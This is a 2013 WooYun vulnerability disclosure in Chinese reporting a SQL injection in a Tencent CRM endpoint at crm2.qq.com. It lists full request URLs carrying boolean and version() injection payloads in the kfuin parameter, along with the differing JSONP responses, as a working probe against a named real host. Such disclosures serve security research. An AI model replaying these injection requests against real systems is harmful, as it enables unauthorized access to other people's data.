当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-017424

漏洞标题:腾讯某CRM系统存在SQL注射可能得到系统数据

相关厂商:腾讯客户

漏洞作者: 路人甲

提交时间:2013-01-17 12:57

修复时间:2013-03-03 12:58

公开时间:2013-03-03 12:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-01-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-03-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

腾讯某被广泛使用的CRM系统(客户管理系统)存在明显SQL注射,可得到系统数据,请及时整改

详细说明:

http://crm2.qq.com/cgi/wpacgi/get_wpa_click_params.php?type=11&nameAccount=4000252578&dm=qq.com&cb=JSONP_CALLBACK_3&kfuin=4000252578'and'1'='1

JSONP_CALLBACK_3({"numRet":{"r":0,"kfuin":938041585,"nameAccount":"4000252578","envId":12},"taRet":{"r":0,"sid":null},"env":null})


http://crm2.qq.com/cgi/wpacgi/get_wpa_click_params.php?type=11&nameAccount=4000252578&dm=qq.com&cb=JSONP_CALLBACK_3&kfuin=4000252578'and'1'='2

JSONP_CALLBACK_3({"numRet":{"r":1,"kfuin":"4000252578'and'1'='2","nameAccount":"4000252578","envId":null},"taRet":{"r":0,"sid":null},"env":null})


http://crm2.qq.com/cgi/wpacgi/get_wpa_click_params.php?type=11&nameAccount=4000252578&dm=qq.com&cb=JSONP_CALLBACK_3&kfuin=4000252578'or%20version()%3E1%23

JSONP_CALLBACK_3({"numRet":{"r":0,"kfuin":938067669,"nameAccount":"8000654755","envId":5000},"taRet":{"r":0,"sid":null},"env":null})


漏洞证明:

害怕南山法院不敢

修复方案:

自己解决

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝